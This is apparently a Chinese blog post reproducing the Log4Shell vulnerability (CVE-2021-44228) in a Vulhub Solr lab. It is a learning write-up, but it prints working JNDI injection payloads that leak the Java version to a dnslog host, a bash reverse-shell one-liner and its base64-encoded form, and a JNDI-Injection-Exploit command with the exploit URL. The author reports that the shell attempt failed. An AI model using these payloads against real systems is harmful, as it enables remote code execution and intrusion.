VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了,环境搭建不讲,网上其他文章很好。

访问该环境:

POC

构造(任选其一):

bash 复制代码
 ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}

我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。

访问:

bash 复制代码
http://192.168.220.142:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.rsjlpxqral.dgrh3.cn}

访问之后出现一条dnslog日志:

并且知道了java的版本是1.8.0_102

因为poc里面加了一个查看java版本的命令${sys:java.version},所以讲java版本结果回显在dnslog上面来了。

下面说怎么反弹shell操作:

bash 复制代码
bash -i >& /dev/tcp/192.168.220.142/6666 0>&1

意思是把shell回弹到/192.168.220.142/6666地方

bash编码一下:https://www.sqlsec.com/rce/

bash 复制代码
bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMC4xNDIvNjY2NyAwPiYx}|{base64, -d}|{bash, -i}

下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

使用命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMC4xNDIvNjY2NyAwPiYx}|{base64, -d}|{bash, -i}" -A "http://192.168.220.142/" -C是编码后的内容,-A是反弹shell的ip地址。

注意要先nc监听6666端口

如上图访问

bash 复制代码
http://192.168.220.142:8983/solr/admin/cores?action=${jndi:ldap://192.168.220.142:1099/eftobp}

额 不知道为啥子没成功。。。。。

然后看了看其他人的文章发现:

就这样吧,反正搞懂了过程,也知道实战中怎么利用了。

而且我的环境是java1.8,真搞不懂

下面来看下原理吧:

bash 复制代码
Log4j→Log for Java,Apache的开源日志记录组件

JDK→1.8u21以下的版本

看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143

相关推荐
凭君语未可10 小时前
详解Maven的主要生命周期
java·log4j·maven
WIN赢1 天前
单元测试的编写
单元测试·log4j
zerohawk4 天前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员7 天前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j
一颗小树x7 天前
【机器人】复现 GrainGrasp 精细指导的灵巧手抓取
机器人·抓取·复现·灵巧手·graingrasp
故事与他6458 天前
Apache中间件漏洞攻略
java·服务器·安全·网络安全·中间件·log4j·apache
江沉晚呤时10 天前
精益架构设计:深入理解与实践 C# 中的单一职责原则
java·jvm·算法·log4j·.netcore·net
为美好的生活献上中指11 天前
java每日精进 3.21 【SpringBoot规范2.0】
java·开发语言·spring boot·log4j·async·mail
-$_$-12 天前
【MyDB】5-索引管理之4-单元测试
单元测试·log4j
爱的叹息16 天前
java自带日志系统介绍(JUL)以及和Log4j 2、Logback、SLF4J不同日志工具的对比
java·log4j·logback